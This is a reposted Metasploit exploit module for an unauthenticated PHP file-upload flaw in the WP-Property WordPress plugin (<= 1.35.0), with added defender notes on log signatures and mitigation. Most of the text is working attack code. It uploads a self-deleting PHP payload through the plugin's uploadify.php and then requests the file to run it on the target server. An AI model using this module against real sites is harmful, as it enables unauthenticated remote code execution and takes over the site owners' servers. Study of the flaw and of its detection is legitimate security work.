WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/php_exe'
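# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0 according to the module description).
#
# The listing on this page was interleaved with extraction noise and the
# PhpEXE mixin name was mangled ("Msf::Exploit: hpEXE"); both are repaired
# here. The request logic is unchanged.
#
# Defender notes (derived from the requests this module sends):
# - Affected endpoint:
#   <wordpress>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
# - Log signature: an unauthenticated multipart POST to that script carrying a
#   "Filedata" part with a ".php" filename, followed shortly by a GET for a
#   ".php" file under the same uploadify/ directory.
# - The payload is requested with :unlink_self => true, so the uploaded file
#   is expected to delete itself after it runs; web-server access logs are
#   the more durable evidence than the file system.
# - Mitigation: update the plugin to a release newer than 1.35.0, remove the
#   bundled uploadify.php if it is not needed, and deny PHP execution in
#   directories that accept uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (references, targets, payload constraints) and
  # the TARGETURI option pointing at the WordPress base path.
  #
  # @param info [Hash] metadata overrides merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the bundled uploadify.php script.
  #
  # This only confirms that the script answers with HTTP 200; it does not read
  # the plugin version, so "Appears" means the endpoint is reachable, not that
  # the installed release is confirmed vulnerable. The same GET is a quick way
  # for an administrator to verify whether the script is still exposed.
  #
  # @return [Exploit::CheckCode] Unknown on no response or a non-200 status,
  #   Appears otherwise
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Sends a multipart POST with a randomly named .php file to uploadify.php,
  # then requests the path returned in the response body.
  #
  # Fails with UnexpectedReply when the upload response is missing, is not
  # HTTP 200, or does not echo the generated file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two form fields: the file itself ("Filedata") and the destination
    # directory ("folder"), which is set to the uploadify directory.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Strips a CRLF that precedes a "--_Part_" boundary marker at line start.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the path of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end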
不要问我这写的是什么 怎么利用 我是说msf.